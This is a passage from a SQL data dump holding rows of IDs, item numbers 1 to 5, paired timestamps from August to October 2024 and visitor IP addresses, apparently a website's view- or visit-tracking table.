02:09:35','185.241.208.23'),(1622,5,'2024-08-31 02:09:35','2024-09-01 02:09:35','185.241.208.23'),(1623,5,'2024-08-31 22:37:35','2024-09-01 22:37:35','185.241.208.249'),(1624,4,'2024-08-31 22:37:35','2024-09-01 22:37:35','185.241.208.249'),(1625,1,'2024-08-31 22:37:35','2024-09-01 22:37:35','185.241.208.249'),(1626,2,'2024-08-31 22:37:35','2024-09-01 22:37:35','185.241.208.249'),(1627,3,'2024-08-31 22:37:35','2024-09-01 22:37:35','185.241.208.249'),(1628,5,'2024-09-01 01:39:07','2024-09-02 01:39:07','13.60.195.130'),(1629,4,'2024-09-01 01:39:07','2024-09-02 01:39:07','13.60.195.130'),(1630,1,'2024-09-01 01:39:07','2024-09-02 01:39:07','13.60.195.130'),(1631,2,'2024-09-01 01:39:07','2024-09-02 01:39:07','13.60.195.130'),(1632,3,'2024-09-01 01:39:07','2024-09-02 01:39:07','13.60.195.130'),(1633,5,'2024-09-02 06:38:00','2024-09-03 06:38:00','13.53.124.111'),(1634,3,'2024-09-02 06:38:00','2024-09-03 06:38:00','13.53.124.111'),(1635,1,'2024-09-02 06:38:00','2024-09-03 06:38:00','13.53.124.111'),(1636,4,'2024-09-02 06:38:01','2024-09-03 06:38:01','13.53.124.111'),(1637,2,'2024-09-02 06:38:01','2024-09-03 06:38:01','13.53.124.111'),(1638,2,'2024-09-02 20:22:17','2024-09-03 20:22:17','13.60.195.130'),(1639,5,'2024-09-02 20:22:17','2024-09-03 20:22:17','13.60.195.130'),(1640,3,'2024-09-02 20:22:17','2024-09-03 20:22:17','13.60.195.130'),(1641,1,'2024-09-02 20:22:17','2024-09-03 20:22:17','13.60.195.130'),(1642,4,'2024-09-02 20:22:18','2024-09-03 20:22:18','13.60.195.130'),(1643,1,'2024-09-02 22:32:06','2024-09-03 22:32:06','185.241.208.248'),(1644,5,'2024-09-02 22:32:06','2024-09-03 22:32:06','185.241.208.248'),(1645,3,'2024-09-02 22:32:06','2024-09-03 22:32:06','185.241.208.248'),(1646,2,'2024-09-02 22:32:06','2024-09-03 22:32:06','185.241.208.248'),(1647,4,'2024-09-02 22:32:07','2024-09-03 22:32:07','185.241.208.248'),(1648,1,'2024-09-03 00:06:04','2024-09-04 00:06:04','185.241.208.23'),(1649,5,'2024-09-03 00:06:04','2024-09-04 00:06:04','185.241.208.23'),(1650,3,'2024-09-03 00:06:04','2024-09-04 00:06:04','185.241.208.23'),(1651,2,'2024-09-03 00:06:04','2024-09-04 00:06:04','185.241.208.23'),(1652,4,'2024-09-03 00:06:05','2024-09-04 00:06:05','185.241.208.23'),(1653,4,'2024-09-03 01:17:09','2024-09-04 01:17:09','185.241.208.249'),(1654,1,'2024-09-03 01:17:09','2024-09-04 01:17:09','185.241.208.249'),(1655,3,'2024-09-03 01:17:09','2024-09-04 01:17:09','185.241.208.249'),(1656,5,'2024-09-03 01:17:09','2024-09-04 01:17:09','185.241.208.249'),(1657,2,'2024-09-03 01:17:11','2024-09-04 01:17:11','185.241.208.249'),(1658,2,'2024-09-03 23:46:42','2024-09-04 23:46:42','185.241.208.222'),(1659,5,'2024-09-03 23:46:42','2024-09-04 23:46:42','185.241.208.222'),(1660,4,'2024-09-03 23:46:42','2024-09-04 23:46:42','185.241.208.222'),(1661,1,'2024-09-03 23:46:42','2024-09-04 23:46:42','185.241.208.222'),(1662,3,'2024-09-03 23:46:45','2024-09-04 23:46:45','185.241.208.222'),(1663,3,'2024-09-04 00:35:04','2024-09-05 00:35:04','13.60.195.130'),(1664,4,'2024-09-04 00:35:04','2024-09-05 00:35:04','13.60.195.130'),(1665,1,'2024-09-04 00:35:05','2024-09-05 00:35:05','13.60.195.130'),(1666,2,'2024-09-04 00:35:05','2024-09-05 00:35:05','13.60.195.130'),(1667,5,'2024-09-04 00:35:06','2024-09-05 00:35:06','13.60.195.130'),(1668,1,'2024-09-04 09:38:52','2024-09-05 09:38:52','103.132.183.121'),(1669,2,'2024-09-04 09:38:53','2024-09-05 09:38:53','103.132.183.121'),(1670,5,'2024-09-04 09:41:54','2024-09-05 09:41:54','103.132.183.121'),(1671,3,'2024-09-04 09:42:18','2024-09-05 09:42:18','103.132.183.121'),(1672,4,'2024-09-04 09:54:12','2024-09-05 09:54:12','103.132.183.121'),(1673,1,'2024-09-04 10:02:08','2024-09-05 10:02:08','185.241.208.249'),(1674,2,'2024-09-04 10:02:08','2024-09-05 10:02:08','185.241.208.249'),(1675,3,'2024-09-04 10:02:08','2024-09-05 10:02:08','185.241.208.249'),(1676,4,'2024-09-04 10:02:08','2024-09-05 10:02:08','185.241.208.249'),(1677,5,'2024-09-04 10:02:09','2024-09-05 10:02:09','185.241.208.249'),(1678,5,'2024-09-05 06:21:12','2024-09-06 06:21:12','185.241.208.248'),(1679,1,'2024-09-05 06:21:12','2024-09-06 06:21:12','185.241.208.248'),(1680,4,'2024-09-05 06:21:12','2024-09-06 06:21:12','185.241.208.248'),(1681,2,'2024-09-05 06:21:14','2024-09-06 06:21:14','185.241.208.248'),(1682,3,'2024-09-05 06:21:14','2024-09-06 06:21:14','185.241.208.248'),(1683,2,'2024-09-06 13:41:51','2024-09-07 13:41:51','103.132.183.121'),(1684,4,'2024-09-06 13:41:51','2024-09-07 13:41:51','103.132.183.121'),(1685,3,'2024-09-06 13:46:05','2024-09-07 13:46:05','103.132.183.121'),(1686,1,'2024-09-06 13:46:05','2024-09-07 13:46:05','103.132.183.121'),(1687,5,'2024-09-06 13:46:05','2024-09-07 13:46:05','103.132.183.121'),(1688,3,'2024-09-06 20:52:28','2024-09-07 20:52:28','185.241.208.222'),(1689,2,'2024-09-06 20:52:28','2024-09-07 20:52:28','185.241.208.222'),(1690,1,'2024-09-06 20:52:28','2024-09-07 20:52:28','185.241.208.222'),(1691,5,'2024-09-06 20:52:28','2024-09-07 20:52:28','185.241.208.222'),(1692,4,'2024-09-06 20:52:29','2024-09-07 20:52:29','185.241.208.222'),(1693,5,'2024-09-07 03:33:05','2024-09-08 03:33:05','185.241.208.23'),(1694,3,'2024-09-07 03:33:06','2024-09-08 03:33:06','185.241.208.23'),(1695,4,'2024-09-07 03:33:06','2024-09-08 03:33:06','185.241.208.23'),(1696,2,'2024-09-07 03:33:06','2024-09-08 03:33:06','185.241.208.23'),(1697,1,'2024-09-07 03:33:07','2024-09-08 03:33:07','185.241.208.23'),(1698,5,'2024-09-07 15:41:44','2024-09-08 15:41:44','185.241.208.190'),(1699,2,'2024-09-07 15:41:45','2024-09-08 15:41:45','185.241.208.190'),(1700,1,'2024-09-07 15:41:45','2024-09-08 15:41:45','185.241.208.190'),(1701,3,'2024-09-07 15:41:45','2024-09-08 15:41:45','185.241.208.190'),(1702,4,'2024-09-07 15:41:45','2024-09-08 15:41:45','185.241.208.190'),(1703,2,'2024-09-08 01:38:57','2024-09-09 01:38:57','185.241.208.222'),(1704,3,'2024-09-08 01:38:57','2024-09-09 01:38:57','185.241.208.222'),(1705,4,'2024-09-08 01:38:57','2024-09-09 01:38:57','185.241.208.222'),(1706,1,'2024-09-08 01:38:57','2024-09-09 01:38:57','185.241.208.222'),(1707,5,'2024-09-08 01:38:59','2024-09-09 01:38:59','185.241.208.222'),(1708,3,'2024-09-08 23:44:40','2024-09-08 23:54:40','130.51.120.4'),(1709,1,'2024-09-08 23:44:40','2024-09-08 23:54:40','130.51.120.4'),(1710,2,'2024-09-08 23:44:40','2024-09-08 23:54:40','130.51.120.4'),(1711,4,'2024-09-08 23:44:41','2024-09-08 23:54:41','130.51.120.4'),(1712,5,'2024-09-08 23:44:42','2024-09-08 23:54:42','130.51.120.4'),(1713,1,'2024-09-09 00:06:14','2024-09-09 00:16:14','130.51.120.4'),(1714,5,'2024-09-09 00:06:14','2024-09-09 00:16:14','130.51.120.4'),(1715,4,'2024-09-09 00:06:14','2024-09-09 00:16:14','130.51.120.4'),(1716,2,'2024-09-09 00:06:14','2024-09-09 00:16:14','130.51.120.4'),(1717,3,'2024-09-09 00:06:14','2024-09-09 00:16:14','130.51.120.4'),(1718,3,'2024-09-09 00:28:25','2024-09-10 00:28:25','130.51.120.4'),(1719,4,'2024-09-09 00:28:25','2024-09-10 00:28:25','130.51.120.4'),(1720,1,'2024-09-09 00:28:25','2024-09-10 00:28:25','130.51.120.4'),(1721,2,'2024-09-09 00:28:25','2024-09-10 00:28:25','130.51.120.4'),(1722,5,'2024-09-09 00:28:26','2024-09-10 00:28:26','130.51.120.4'),(1723,3,'2024-09-10 21:35:19','2024-09-11 21:35:19','185.241.208.39'),(1724,4,'2024-09-10 21:35:19','2024-09-11 21:35:19','185.241.208.39'),(1725,2,'2024-09-10 21:35:19','2024-09-11 21:35:19','185.241.208.39'),(1726,5,'2024-09-10 21:35:19','2024-09-11 21:35:19','185.241.208.39'),(1727,1,'2024-09-10 21:35:20','2024-09-11 21:35:20','185.241.208.39'),(1728,3,'2024-09-11 01:42:32','2024-09-12 01:42:32','185.241.208.23'),(1729,2,'2024-09-11 01:42:32','2024-09-12 01:42:32','185.241.208.23'),(1730,4,'2024-09-11 01:42:32','2024-09-12 01:42:32','185.241.208.23'),(1731,5,'2024-09-11 01:42:32','2024-09-12 01:42:32','185.241.208.23'),(1732,1,'2024-09-11 01:42:32','2024-09-12 01:42:32','185.241.208.23'),(1733,5,'2024-09-11 14:12:00','2024-09-12 14:12:00','185.241.208.155'),(1734,4,'2024-09-11 14:12:00','2024-09-12 14:12:00','185.241.208.155'),(1735,2,'2024-09-11 14:12:00','2024-09-12 14:12:00','185.241.208.155'),(1736,1,'2024-09-11 14:12:00','2024-09-12 14:12:00','185.241.208.155'),(1737,3,'2024-09-11 14:12:01','2024-09-12 14:12:01','185.241.208.155'),(1738,1,'2024-09-12 02:11:30','2024-09-13 02:11:30','185.241.208.39'),(1739,2,'2024-09-12 02:11:30','2024-09-13 02:11:30','185.241.208.39'),(1740,3,'2024-09-12 02:11:30','2024-09-13 02:11:30','185.241.208.39'),(1741,5,'2024-09-12 02:11:30','2024-09-13 02:11:30','185.241.208.39'),(1742,4,'2024-09-12 02:11:31','2024-09-13 02:11:31','185.241.208.39'),(1743,2,'2024-09-12 02:47:09','2024-09-13 02:47:09','185.241.208.190'),(1744,3,'2024-09-12 02:47:09','2024-09-13 02:47:09','185.241.208.190'),(1745,5,'2024-09-12 02:47:09','2024-09-13 02:47:09','185.241.208.190'),(1746,4,'2024-09-12 02:47:09','2024-09-13 02:47:09','185.241.208.190'),(1747,1,'2024-09-12 02:47:09','2024-09-13 02:47:09','185.241.208.190'),(1748,3,'2024-09-12 11:53:13','2024-09-13 11:53:13','43.130.104.164'),(1749,4,'2024-09-12 11:53:13','2024-09-13 11:53:13','43.130.104.164'),(1750,5,'2024-09-12 11:53:13','2024-09-13 11:53:13','43.130.104.164'),(1751,2,'2024-09-12 11:53:13','2024-09-13 11:53:13','43.130.104.164'),(1752,1,'2024-09-12 11:53:13','2024-09-13 11:53:13','43.130.104.164'),(1753,2,'2024-09-13 00:06:07','2024-09-14 00:06:07','185.241.208.222'),(1754,5,'2024-09-13 00:06:07','2024-09-14 00:06:07','185.241.208.222'),(1755,3,'2024-09-13 00:06:07','2024-09-14 00:06:07','185.241.208.222'),(1756,1,'2024-09-13 00:06:07','2024-09-14 00:06:07','185.241.208.222'),(1757,4,'2024-09-13 00:06:07','2024-09-14 00:06:07','185.241.208.222'),(1758,1,'2024-09-13 01:59:26','2024-09-14 01:59:26','49.51.70.155'),(1759,4,'2024-09-13 01:59:26','2024-09-14 01:59:26','49.51.70.155'),(1760,3,'2024-09-13 01:59:26','2024-09-14 01:59:26','49.51.70.155'),(1761,2,'2024-09-13 01:59:26','2024-09-14 01:59:26','49.51.70.155'),(1762,5,'2024-09-13 01:59:26','2024-09-14 01:59:26','49.51.70.155'),(1763,1,'2024-09-13 02:15:03','2024-09-14 02:15:03','194.233.86.147'),(1764,5,'2024-09-13 02:15:03','2024-09-14 02:15:03','194.233.86.147'),(1765,2,'2024-09-13 02:15:03','2024-09-14 02:15:03','194.233.86.147'),(1766,3,'2024-09-13 02:15:03','2024-09-14 02:15:03','194.233.86.147'),(1767,4,'2024-09-13 02:15:03','2024-09-14 02:15:03','194.233.86.147'),(1768,4,'2024-09-13 06:13:47','2024-09-14 06:13:47','185.241.208.190'),(1769,2,'2024-09-13 06:13:47','2024-09-14 06:13:47','185.241.208.190'),(1770,5,'2024-09-13 06:13:47','2024-09-14 06:13:47','185.241.208.190'),(1771,1,'2024-09-13 06:13:48','2024-09-14 06:13:48','185.241.208.190'),(1772,3,'2024-09-13 06:13:48','2024-09-14 06:13:48','185.241.208.190'),(1773,4,'2024-09-13 08:44:25','2024-09-14 08:44:25','185.241.208.155'),(1774,5,'2024-09-13 08:44:25','2024-09-14 08:44:25','185.241.208.155'),(1775,2,'2024-09-13 08:44:25','2024-09-14 08:44:25','185.241.208.155'),(1776,3,'2024-09-13 08:44:25','2024-09-14 08:44:25','185.241.208.155'),(1777,1,'2024-09-13 08:44:26','2024-09-14 08:44:26','185.241.208.155'),(1778,1,'2024-09-13 13:53:48','2024-09-14 13:53:48','43.130.104.164'),(1779,3,'2024-09-13 13:53:48','2024-09-14 13:53:48','43.130.104.164'),(1780,2,'2024-09-13 13:53:48','2024-09-14 13:53:48','43.130.104.164'),(1781,4,'2024-09-13 13:53:48','2024-09-14 13:53:48','43.130.104.164'),(1782,5,'2024-09-13 13:53:48','2024-09-14 13:53:48','43.130.104.164'),(1783,5,'2024-09-14 04:09:43','2024-09-15 04:09:43','185.241.208.222'),(1784,3,'2024-09-14 04:09:43','2024-09-15 04:09:43','185.241.208.222'),(1785,4,'2024-09-14 04:09:43','2024-09-15 04:09:43','185.241.208.222'),(1786,1,'2024-09-14 04:09:43','2024-09-15 04:09:43','185.241.208.222'),(1787,2,'2024-09-14 04:09:44','2024-09-15 04:09:44','185.241.208.222'),(1788,3,'2024-09-15 00:37:47','2024-09-16 00:37:47','3.145.216.108'),(1789,2,'2024-09-15 00:37:47','2024-09-16 00:37:47','3.145.216.108'),(1790,1,'2024-09-15 00:37:47','2024-09-16 00:37:47','3.145.216.108'),(1791,4,'2024-09-15 00:37:47','2024-09-16 00:37:47','3.145.216.108'),(1792,5,'2024-09-15 00:37:47','2024-09-16 00:37:47','3.145.216.108'),(1793,1,'2024-09-15 05:02:37','2024-09-16 05:02:37','103.132.183.121'),(1794,4,'2024-09-15 05:02:37','2024-09-16 05:02:37','103.132.183.121'),(1795,2,'2024-09-15 05:02:37','2024-09-16 05:02:37','103.132.183.121'),(1796,5,'2024-09-15 05:02:37','2024-09-16 05:02:37','103.132.183.121'),(1797,3,'2024-09-15 05:02:38','2024-09-16 05:02:38','103.132.183.121'),(1798,5,'2024-09-15 11:57:36','2024-09-16 11:57:36','3.144.160.251'),(1799,3,'2024-09-15 11:57:36','2024-09-16 11:57:36','3.144.160.251'),(1800,1,'2024-09-15 11:57:37','2024-09-16 11:57:37','3.144.160.251'),(1801,4,'2024-09-15 11:57:37','2024-09-16 11:57:37','3.144.160.251'),(1802,2,'2024-09-15 11:57:37','2024-09-16 11:57:37','3.144.160.251'),(1803,5,'2024-09-16 07:03:45','2024-09-17 07:03:45','185.241.208.39'),(1804,1,'2024-09-16 07:03:45','2024-09-17 07:03:45','185.241.208.39'),(1805,2,'2024-09-16 07:03:45','2024-09-17 07:03:45','185.241.208.39'),(1806,4,'2024-09-16 07:03:46','2024-09-17 07:03:46','185.241.208.39'),(1807,3,'2024-09-16 07:03:46','2024-09-17 07:03:46','185.241.208.39'),(1808,2,'2024-09-17 02:37:44','2024-09-18 02:37:44','3.144.160.251'),(1809,4,'2024-09-17 02:37:45','2024-09-18 02:37:45','3.144.160.251'),(1810,1,'2024-09-17 02:37:45','2024-09-18 02:37:45','3.144.160.251'),(1811,3,'2024-09-17 02:37:45','2024-09-18 02:37:45','3.144.160.251'),(1812,5,'2024-09-17 02:37:46','2024-09-18 02:37:46','3.144.160.251'),(1813,3,'2024-09-17 13:59:31','2024-09-18 13:59:31','3.145.216.108'),(1814,1,'2024-09-17 13:59:31','2024-09-18 13:59:31','3.145.216.108'),(1815,4,'2024-09-17 13:59:31','2024-09-18 13:59:31','3.145.216.108'),(1816,5,'2024-09-17 13:59:31','2024-09-18 13:59:31','3.145.216.108'),(1817,2,'2024-09-17 13:59:31','2024-09-18 13:59:31','3.145.216.108'),(1818,3,'2024-09-17 14:08:06','2024-09-18 14:08:06','194.233.86.147'),(1819,5,'2024-09-17 14:08:06','2024-09-18 14:08:06','194.233.86.147'),(1820,4,'2024-09-17 14:08:06','2024-09-18 14:08:06','194.233.86.147'),(1821,1,'2024-09-17 14:08:06','2024-09-18 14:08:06','194.233.86.147'),(1822,2,'2024-09-17 14:08:06','2024-09-18 14:08:06','194.233.86.147'),(1823,4,'2024-09-17 22:36:37','2024-09-18 22:36:37','91.92.242.163'),(1824,5,'2024-09-17 22:36:37','2024-09-18 22:36:37','91.92.242.163'),(1825,2,'2024-09-17 22:36:37','2024-09-18 22:36:37','91.92.242.163'),(1826,3,'2024-09-17 22:36:37','2024-09-18 22:36:37','91.92.242.163'),(1827,1,'2024-09-17 22:36:37','2024-09-18 22:36:37','91.92.242.163'),(1828,1,'2024-09-18 14:31:30','2024-09-19 14:31:30','3.144.160.251'),(1829,5,'2024-09-18 14:31:30','2024-09-19 14:31:30','3.144.160.251'),(1830,2,'2024-09-18 14:31:30','2024-09-19 14:31:30','3.144.160.251'),(1831,4,'2024-09-18 14:31:30','2024-09-19 14:31:30','3.144.160.251'),(1832,3,'2024-09-18 14:31:32','2024-09-19 14:31:32','3.144.160.251'),(1833,1,'2024-09-19 01:23:58','2024-09-19 01:33:58','185.241.208.39'),(1834,2,'2024-09-19 01:48:04','2024-09-19 01:58:04','185.241.208.39'),(1835,1,'2024-09-19 01:52:52','2024-09-20 01:52:52','185.241.208.39'),(1836,2,'2024-09-19 02:02:23','2024-09-20 02:02:23','185.241.208.39'),(1837,5,'2024-09-19 02:02:24','2024-09-20 02:02:24','185.241.208.39'),(1838,3,'2024-09-19 02:07:01','2024-09-20 02:07:01','185.241.208.39'),(1839,4,'2024-09-19 02:07:01','2024-09-20 02:07:01','185.241.208.39'),(1840,5,'2024-09-19 07:09:43','2024-09-20 07:09:43','194.233.86.147'),(1841,2,'2024-09-19 07:18:53','2024-09-20 07:18:53','194.233.86.147'),(1842,4,'2024-09-19 07:18:53','2024-09-20 07:18:53','194.233.86.147'),(1843,1,'2024-09-19 07:18:55','2024-09-20 07:18:55','194.233.86.147'),(1844,3,'2024-09-19 07:27:53','2024-09-20 07:27:53','194.233.86.147'),(1845,1,'2024-09-19 22:48:24','2024-09-20 22:48:24','185.241.208.248'),(1846,3,'2024-09-19 22:48:24','2024-09-20 22:48:24','185.241.208.248'),(1847,4,'2024-09-19 22:48:24','2024-09-20 22:48:24','185.241.208.248'),(1848,5,'2024-09-19 22:48:24','2024-09-20 22:48:24','185.241.208.248'),(1849,2,'2024-09-19 22:48:24','2024-09-20 22:48:24','185.241.208.248'),(1850,1,'2024-09-20 07:15:41','2024-09-20 07:25:41','185.241.208.23'),(1851,1,'2024-09-20 08:03:15','2024-09-21 08:03:15','185.241.208.174'),(1852,2,'2024-09-20 08:03:15','2024-09-21 08:03:15','185.241.208.174'),(1853,5,'2024-09-20 08:03:15','2024-09-21 08:03:15','185.241.208.174'),(1854,4,'2024-09-20 08:03:15','2024-09-21 08:03:15','185.241.208.174'),(1855,3,'2024-09-20 08:03:16','2024-09-21 08:03:16','185.241.208.174'),(1856,2,'2024-09-20 10:21:01','2024-09-21 10:21:01','185.241.208.222'),(1857,1,'2024-09-20 10:21:01','2024-09-21 10:21:01','185.241.208.222'),(1858,4,'2024-09-20 10:21:01','2024-09-21 10:21:01','185.241.208.222'),(1859,5,'2024-09-20 10:21:02','2024-09-21 10:21:02','185.241.208.222'),(1860,3,'2024-09-20 10:21:02','2024-09-21 10:21:02','185.241.208.222'),(1861,5,'2024-09-20 11:05:06','2024-09-21 11:05:06','185.241.208.155'),(1862,3,'2024-09-20 11:05:06','2024-09-21 11:05:06','185.241.208.155'),(1863,4,'2024-09-20 11:05:06','2024-09-21 11:05:06','185.241.208.155'),(1864,1,'2024-09-20 11:05:06','2024-09-21 11:05:06','185.241.208.155'),(1865,2,'2024-09-20 11:05:06','2024-09-21 11:05:06','185.241.208.155'),(1866,5,'2024-09-22 06:33:37','2024-09-23 06:33:37','165.232.146.82'),(1867,3,'2024-09-22 06:33:37','2024-09-23 06:33:37','165.232.146.82'),(1868,2,'2024-09-22 06:33:38','2024-09-23 06:33:38','165.232.146.82'),(1869,1,'2024-09-22 06:33:38','2024-09-23 06:33:38','165.232.146.82'),(1870,4,'2024-09-22 06:33:38','2024-09-23 06:33:38','165.232.146.82'),(1871,1,'2024-09-22 20:09:04','2024-09-23 20:09:04','185.241.208.222'),(1872,5,'2024-09-22 20:09:04','2024-09-23 20:09:04','185.241.208.222'),(1873,2,'2024-09-22 20:09:04','2024-09-23 20:09:04','185.241.208.222'),(1874,3,'2024-09-22 20:09:04','2024-09-23 20:09:04','185.241.208.222'),(1875,4,'2024-09-22 20:09:06','2024-09-23 20:09:06','185.241.208.222'),(1876,1,'2024-09-23 07:36:47','2024-09-24 07:36:47','141.98.11.69'),(1877,5,'2024-09-23 07:36:47','2024-09-24 07:36:47','141.98.11.69'),(1878,3,'2024-09-23 07:36:47','2024-09-24 07:36:47','141.98.11.69'),(1879,4,'2024-09-23 07:36:47','2024-09-24 07:36:47','141.98.11.69'),(1880,2,'2024-09-23 07:36:47','2024-09-24 07:36:47','141.98.11.69'),(1881,1,'2024-09-23 08:15:53','2024-09-24 08:15:53','185.241.208.155'),(1882,3,'2024-09-23 08:15:53','2024-09-24 08:15:53','185.241.208.155'),(1883,4,'2024-09-23 08:15:53','2024-09-24 08:15:53','185.241.208.155'),(1884,2,'2024-09-23 08:15:53','2024-09-24 08:15:53','185.241.208.155'),(1885,5,'2024-09-23 08:15:53','2024-09-24 08:15:53','185.241.208.155'),(1886,1,'2024-09-23 10:22:24','2024-09-24 10:22:24','165.232.146.82'),(1887,3,'2024-09-23 10:22:24','2024-09-24 10:22:24','165.232.146.82'),(1888,4,'2024-09-23 10:22:24','2024-09-24 10:22:24','165.232.146.82'),(1889,5,'2024-09-23 10:22:24','2024-09-24 10:22:24','165.232.146.82'),(1890,2,'2024-09-23 10:22:24','2024-09-24 10:22:24','165.232.146.82'),(1891,2,'2024-09-24 05:07:42','2024-09-25 05:07:42','45.138.16.206'),(1892,4,'2024-09-24 05:07:42','2024-09-25 05:07:42','45.138.16.206'),(1893,1,'2024-09-24 05:07:42','2024-09-25 05:07:42','45.138.16.206'),(1894,3,'2024-09-24 05:07:42','2024-09-25 05:07:42','45.138.16.206'),(1895,5,'2024-09-24 05:07:43','2024-09-25 05:07:43','45.138.16.206'),(1896,2,'2024-09-25 06:23:29','2024-09-26 06:23:29','185.241.208.39'),(1897,1,'2024-09-25 06:23:29','2024-09-26 06:23:29','185.241.208.39'),(1898,5,'2024-09-25 06:23:29','2024-09-26 06:23:29','185.241.208.39'),(1899,3,'2024-09-25 06:23:29','2024-09-26 06:23:29','185.241.208.39'),(1900,4,'2024-09-25 06:23:30','2024-09-26 06:23:30','185.241.208.39'),(1901,2,'2024-09-25 10:13:34','2024-09-26 10:13:34','185.241.208.248'),(1902,1,'2024-09-25 10:13:34','2024-09-26 10:13:34','185.241.208.248'),(1903,5,'2024-09-25 10:13:34','2024-09-26 10:13:34','185.241.208.248'),(1904,3,'2024-09-25 10:13:34','2024-09-26 10:13:34','185.241.208.248'),(1905,4,'2024-09-25 10:13:34','2024-09-26 10:13:34','185.241.208.248'),(1906,1,'2024-09-25 10:25:01','2024-09-26 10:25:01','185.241.208.155'),(1907,2,'2024-09-25 10:25:01','2024-09-26 10:25:01','185.241.208.155'),(1908,4,'2024-09-25 10:25:01','2024-09-26 10:25:01','185.241.208.155'),(1909,5,'2024-09-25 10:25:01','2024-09-26 10:25:01','185.241.208.155'),(1910,3,'2024-09-25 10:25:01','2024-09-26 10:25:01','185.241.208.155'),(1911,1,'2024-09-25 23:27:54','2024-09-25 23:37:54','130.51.120.4'),(1912,2,'2024-09-25 23:27:54','2024-09-25 23:37:54','130.51.120.4'),(1913,1,'2024-09-25 23:42:19','2024-09-25 23:52:19','130.51.120.4'),(1914,2,'2024-09-25 23:42:19','2024-09-25 23:52:19','130.51.120.4'),(1915,3,'2024-09-25 23:50:43','2024-09-26 00:00:43','130.51.120.4'),(1916,1,'2024-09-25 23:55:37','2024-09-26 23:55:37','130.51.120.4'),(1917,2,'2024-09-25 23:56:27','2024-09-26 23:56:27','130.51.120.4'),(1918,3,'2024-09-26 02:59:42','2024-09-27 02:59:42','130.51.120.4'),(1919,4,'2024-09-26 03:23:49','2024-09-27 03:23:49','130.51.120.4'),(1920,5,'2024-09-26 03:32:18','2024-09-27 03:32:18','130.51.120.4'),(1921,2,'2024-09-26 11:08:28','2024-09-27 11:08:28','185.241.208.39'),(1922,3,'2024-09-26 11:08:28','2024-09-27 11:08:28','185.241.208.39'),(1923,1,'2024-09-26 11:08:28','2024-09-27 11:08:28','185.241.208.39'),(1924,5,'2024-09-26 11:08:28','2024-09-27 11:08:28','185.241.208.39'),(1925,4,'2024-09-26 11:08:28','2024-09-27 11:08:28','185.241.208.39'),(1926,3,'2024-09-26 19:11:30','2024-09-27 19:11:30','165.232.146.82'),(1927,5,'2024-09-26 19:11:30','2024-09-27 19:11:30','165.232.146.82'),(1928,1,'2024-09-26 19:11:30','2024-09-27 19:11:30','165.232.146.82'),(1929,2,'2024-09-26 19:11:31','2024-09-27 19:11:31','165.232.146.82'),(1930,4,'2024-09-26 19:11:31','2024-09-27 19:11:31','165.232.146.82'),(1931,1,'2024-09-27 00:02:16','2024-09-27 00:12:16','130.51.120.4'),(1932,2,'2024-09-27 00:03:55','2024-09-27 00:13:55','130.51.120.4'),(1933,1,'2024-09-27 00:18:29','2024-09-27 00:28:29','130.51.120.4'),(1934,2,'2024-09-27 00:20:39','2024-09-27 00:30:39','130.51.120.4'),(1935,1,'2024-09-27 00:35:22','2024-09-28 00:35:22','130.51.120.4'),(1936,2,'2024-09-27 15:32:53','2024-09-28 15:32:53','130.51.120.4'),(1937,2,'2024-09-27 21:57:32','2024-09-27 22:07:32','13.127.107.129'),(1938,1,'2024-09-27 21:57:32','2024-09-27 22:07:32','13.127.107.129'),(1939,4,'2024-09-27 22:00:07','2024-09-27 22:10:07','13.127.107.129'),(1940,3,'2024-09-27 22:01:25','2024-09-27 22:11:25','13.127.107.129'),(1941,2,'2024-09-27 22:13:01','2024-09-27 22:23:01','13.127.107.129'),(1942,1,'2024-09-27 22:13:01','2024-09-27 22:23:01','13.127.107.129'),(1943,3,'2024-09-27 22:17:05','2024-09-27 22:27:05','13.127.107.129'),(1944,4,'2024-09-27 22:17:05','2024-09-27 22:27:05','13.127.107.129'),(1945,1,'2024-09-27 22:29:27','2024-09-28 22:29:27','13.127.107.129'),(1946,2,'2024-09-27 22:29:27','2024-09-28 22:29:27','13.127.107.129'),(1947,3,'2024-09-27 22:34:02','2024-09-28 22:34:02','13.127.107.129'),(1948,4,'2024-09-27 22:35:38','2024-09-28 22:35:38','13.127.107.129'),(1949,5,'2024-09-27 22:43:19','2024-09-27 22:53:19','13.127.107.129'),(1950,3,'2024-09-28 03:34:42','2024-09-29 03:34:42','185.241.208.39'),(1951,2,'2024-09-28 03:34:42','2024-09-29 03:34:42','185.241.208.39'),(1952,4,'2024-09-28 03:34:42','2024-09-29 03:34:42','185.241.208.39'),(1953,1,'2024-09-28 03:34:43','2024-09-29 03:34:43','185.241.208.39'),(1954,5,'2024-09-28 03:34:44','2024-09-29 03:34:44','185.241.208.39'),(1955,5,'2024-09-29 07:59:58','2024-09-30 07:59:58','185.241.208.39'),(1956,1,'2024-09-29 07:59:58','2024-09-30 07:59:58','185.241.208.39'),(1957,3,'2024-09-29 07:59:58','2024-09-30 07:59:58','185.241.208.39'),(1958,4,'2024-09-29 07:59:58','2024-09-30 07:59:58','185.241.208.39'),(1959,2,'2024-09-29 07:59:58','2024-09-30 07:59:58','185.241.208.39'),(1960,1,'2024-09-30 12:47:45','2024-10-01 12:47:45','185.241.208.39'),(1961,4,'2024-09-30 12:47:45','2024-10-01 12:47:45','185.241.208.39'),(1962,5,'2024-09-30 12:47:46','2024-10-01 12:47:46','185.241.208.39'),(1963,3,'2024-09-30 12:47:46','2024-10-01 12:47:46','185.241.208.39'),(1964,2,'2024-09-30 12:47:46','2024-10-01 12:47:46','185.241.208.39'),(1965,2,'2024-10-01 17:32:32','2024-10-02 17:32:32','185.241.208.39'),(1966,5,'2024-10-01 17:32:32','2024-10-02 17:32:32','185.241.208.39'),(1967,3,'2024-10-01 17:32:32','2024-10-02 17:32:32','185.241.208.39'),(1968,4,'2024-10-01 17:32:32','2024-10-02 17:32:32','185.241.208.39'),(1969,1,'2024-10-01 17:32:32','2024-10-02 17:32:32','185.241.208.39'),(1970,3,'2024-10-02 06:35:53','2024-10-03 06:35:53','165.232.146.82'),(1971,1,'2024-10-02 06:35:53','2024-10-03 06:35:53','165.232.146.82'),(1972,4,'2024-10-02 06:35:53','2024-10-03 06:35:53','165.232.146.82'),(1973,5,'2024-10-02 06:35:53','2024-10-03 06:35:53','165.232.146.82'),(1974,2,'2024-10-02 06:35:53','2024-10-03 06:35:53','165.232.146.82'),(1975,3,'2024-10-02 22:34:28','2024-10-03 22:34:28','185.241.208.174'),(1976,2,'2024-10-02 22:34:28','2024-10-03 22:34:28','185.241.208.174'),(1977,4,'2024-10-02 22:34:28','2024-10-03 22:34:28','185.241.208.174'),(1978,1,'2024-10-02 22:34:29','2024-10-03 